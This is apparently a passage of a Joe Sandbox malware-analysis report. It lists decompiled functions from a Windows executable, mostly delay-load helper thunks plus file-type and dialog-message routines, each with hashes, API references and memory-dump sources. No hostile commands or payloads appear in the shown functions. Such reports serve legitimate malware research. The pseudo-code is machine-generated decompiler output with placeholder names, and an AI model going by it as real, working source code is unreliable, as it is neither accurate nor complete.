                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                    • String ID:
                                                    • API String ID: 1915507550-0
                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                    • Instruction ID: 03f77114d4934992448d000375a7d1f5fd8bb19fd6de9630e77b2c3b179e8863
                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                    • Instruction Fuzzy Hash: 63D0C771214209BADF416B61CC1297E7595EB01340F048127BA41D5351EAF1D911A556
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 50%
                                                    			E00CDE5BB(void* __esi) {
				void* _t2;
				intOrPtr _t5;
				void* _t6;
				void* _t11;

				_t11 = __esi;
				if(( *0xcf5650 & 0x00001000) == 0) {
					return _t2;
				} else {
					E00CDE664();
					_t5 =  *0xd21ce8 + 1;
					 *0xd21ce8 = _t5;
					if(_t5 == 1) {
						E00CDE78D(4, 0xd21cec); // executed
					}
					_t6 = E00CDE5EE();
					if(_t6 == 0) {
						 *0xd21ce4 = 0;
						return _t6;
					} else {
						 *0xcf3278(0xd21ce4, _t11);
						return  *((intOrPtr*)( *0xd21ce0))();
					}
				}
			}







                                                    0x00cde5bb
                                                    0x00cde5c5
                                                    0x00cde5ed
                                                    0x00cde5c7
                                                    0x00cde5c7
                                                    0x00cde5d1
                                                    0x00cde5d2
                                                    0x00cde5da
                                                    0x00cde5e3
                                                    0x00cde5e3
                                                    0x00cde831
                                                    0x00cde838
                                                    0x00cde852
                                                    0x00cde85c
                                                    0x00cde83a
                                                    0x00cde848
                                                    0x00cde851
                                                    0x00cde851
                                                    0x00cde838

                                                    APIs
                                                    • DloadProtectSection.DELAYIMP ref: 00CDE5E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: DloadProtectSection
                                                    • String ID:
                                                    • API String ID: 2203082970-0
                                                    • Opcode ID: 622f7e2c3c0afc7e97994772938270ed1d33937337532c50974220fcacbd3d00
                                                    • Instruction ID: 3120791142763dc701e80dd8d2fe227639f1cd239e8251bb4e21796bdc6e6ef1
                                                    • Opcode Fuzzy Hash: 622f7e2c3c0afc7e97994772938270ed1d33937337532c50974220fcacbd3d00
                                                    • Instruction Fuzzy Hash: 92D0A9BC0882408AC212FBA8A8827187250B330B44F804153F334C9390EA6080C2F622
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDDD6D(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xd08458, 0x6a, 0x402, E00CD0264(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00CDB568(); // executed
				return _t7;
			}




                                                    0x00cddd92
                                                    0x00cddd98
                                                    0x00cddd9d

                                                    APIs
                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CD1B3E), ref: 00CDDD92
                                                      • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                      • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                      • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010398,?), ref: 00CDB59E
                                                      • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                      • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                    • String ID:
                                                    • API String ID: 897784432-0
                                                    • Opcode ID: b39a11209d142b0ec5f8ae8be98e72243efce0bda21c03fd1640651bfbe2aff7
                                                    • Instruction ID: e531e7e2424602b1463601a810f241704a60473cea15213258143b83ed08ea89
                                                    • Opcode Fuzzy Hash: b39a11209d142b0ec5f8ae8be98e72243efce0bda21c03fd1640651bfbe2aff7
                                                    • Instruction Fuzzy Hash: 85D09E31144300BAD6122B51DD06F0A7AA2AB98B04F404555B384741B286729D31EF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CC98BC(void* __ecx) {
				long _t3;

				if( *(__ecx + 8) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 8)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}




                                                    0x00cc98c0
                                                    0x00cc98c8
                                                    0x00cc98d1
                                                    0x00cc98da
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc98c2
                                                    0x00cc98c2
                                                    0x00cc98c4
                                                    0x00cc98c4

                                                    APIs
                                                    • GetFileType.KERNELBASE(000000FF,00CC97BE), ref: 00CC98C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: d2a30f54257d40b780d4f57ee64c62dbb3453776adfed8a356e2456b21983bce
                                                    • Instruction ID: 90c4875ed8baf03cd8750f7532d88da876f26329fb6392be1beab35c92f1e97a
                                                    • Opcode Fuzzy Hash: d2a30f54257d40b780d4f57ee64c62dbb3453776adfed8a356e2456b21983bce
                                                    • Instruction Fuzzy Hash: 93C01234800145958E204624D84C6997711EA53365BB486D8C0388A0E1C332CD47EA01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE1D1() {

				E00CDE85D(0xcfc5ec, 0xd2316c); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: aa31872abf5f4143b54708f509934a294b57586a846f171030b5340a6397db15
                                                    • Instruction ID: 9ce15e9890fb3a5c607f063160668b835430f537d228528e8dc45fe39d4a87ca
                                                    • Opcode Fuzzy Hash: aa31872abf5f4143b54708f509934a294b57586a846f171030b5340a6397db15
                                                    • Instruction Fuzzy Hash: 00B012D535C244BC3104314A2D42C3B010CC0C1B28330843FFE01C86C1D840AC103832
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE1EC() {

				E00CDE85D(0xcfc5ec, 0xd23160); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                    • Instruction ID: cc07e88e0541398dd6d04932ef4a4972d2b24716ddb40f41c925dd842d458061
                                                    • Opcode Fuzzy Hash: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                    • Instruction Fuzzy Hash: A5B012D535C248AC3144714E2D42C3B010CC0C0B28330403FFA05C83C1D8406C103932
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE1F6() {

				E00CDE85D(0xcfc5ec, 0xd2315c); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                    • Instruction ID: 8c101ed0473f597e093d72fa7a866f0a20d50b8a6de4be5e3516e933685b9e89
                                                    • Opcode Fuzzy Hash: 765cb816fddeb8d86a9c1907b4fb73dfeaec59a1e34572a4e2b89bde9b8edb0b
                                                    • Instruction Fuzzy Hash: 9DB012D135C244AC3144720A2D02C3B010CC0C1B28330C03FFE09C83C1D840AC043432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDEAE7() {

				E00CDE85D(0xcfc6cc, 0xd23034); // executed
				goto __eax;
			}



                                                    0x00cdeaf9
                                                    0x00cdeb00

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDEAF9
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ec383a67574565957502a22829121625532fa0e3c2c5ffeed75a1ca2d572f394
                                                    • Instruction ID: 432328b0a4afe5b72a2772755b63c1a1aed0d0fe886c9adb9b85d1ea6d8a9eb9
                                                    • Opcode Fuzzy Hash: ec383a67574565957502a22829121625532fa0e3c2c5ffeed75a1ca2d572f394
                                                    • Instruction Fuzzy Hash: D1B0928639A0967C2108B2052E42C360118C090B95320802BB604C8281988008012432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE282() {

				E00CDE85D(0xcfc5ec, 0xd23124); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                    • Instruction ID: 98e1d1531db4a489c56d3a40a5c3688a3ddbaae7d986e228578123b867f628a7
                                                    • Opcode Fuzzy Hash: 51c2cfde7a0b2dd7e27458e8d9f3a524702898d4d792af558c4c2bd3ef15189c
                                                    • Instruction Fuzzy Hash: DBB012E135C154AC3144710A2E03C3B018CC0C0B28330403FFA05C83C1DC406D013432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE2B4() {

				E00CDE85D(0xcfc5ec, 0xd23110); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 88049fb5cb3ef0c844e524b0bfd8999b9d703e757385206c9f5d9aa169f208cd
                                                    • Instruction ID: c5b8a2ff7090f4e19495ea40745722bf827f5dc1fa4199cdb3302b2796d8d5a3
                                                    • Opcode Fuzzy Hash: 88049fb5cb3ef0c844e524b0bfd8999b9d703e757385206c9f5d9aa169f208cd
                                                    • Instruction Fuzzy Hash: 62B012D135C144AC3144710A6D03C7B010CC0C0B28330443FFA05C83C1D8406C003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE246() {

				E00CDE85D(0xcfc5ec, 0xd2313c); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                    • Instruction ID: 38709f3a1525955a5090fee80ce97513b68b79b595965d2b3fedc11caa7895bb
                                                    • Opcode Fuzzy Hash: 1272487acf41393d4427014b032cb8b673ab5d0ba29e7da70f685be819523cd9
                                                    • Instruction Fuzzy Hash: 75B012D135D184AC3148710A2D02C3B010DC0C1B28330803FFE05C83C1D840AC403432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE250() {

				E00CDE85D(0xcfc5ec, 0xd23138); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                    • Instruction ID: f97fd66f695532eb05434c82143a4933a4fa1caa00f77ffb861a854a69bf9435
                                                    • Opcode Fuzzy Hash: 4ef68795ad313e8d260d0218752d6d156660442b9ca849ec2ddb3b9493341464
                                                    • Instruction Fuzzy Hash: 3FB012E135D284BC3188720A2D02C3B010DC0C0B28330413FFA05C83C1D8406C443432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE26E() {

				E00CDE85D(0xcfc5ec, 0xd2312c); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                    • Instruction ID: 54d91ef4607e92cc17a9debe6fed04dbb040e2aab48591c3f293e00d43f20e13
                                                    • Opcode Fuzzy Hash: d18ea00f69753e2a89f57ac6602b1d754673cef5f428f975d151334c47c08d31
                                                    • Instruction Fuzzy Hash: 1AB012D135C154AC3144711A2D02C3B014CC0C1B28330803FFF05C83C1D840AC003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE264() {

				E00CDE85D(0xcfc5ec, 0xd23130); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
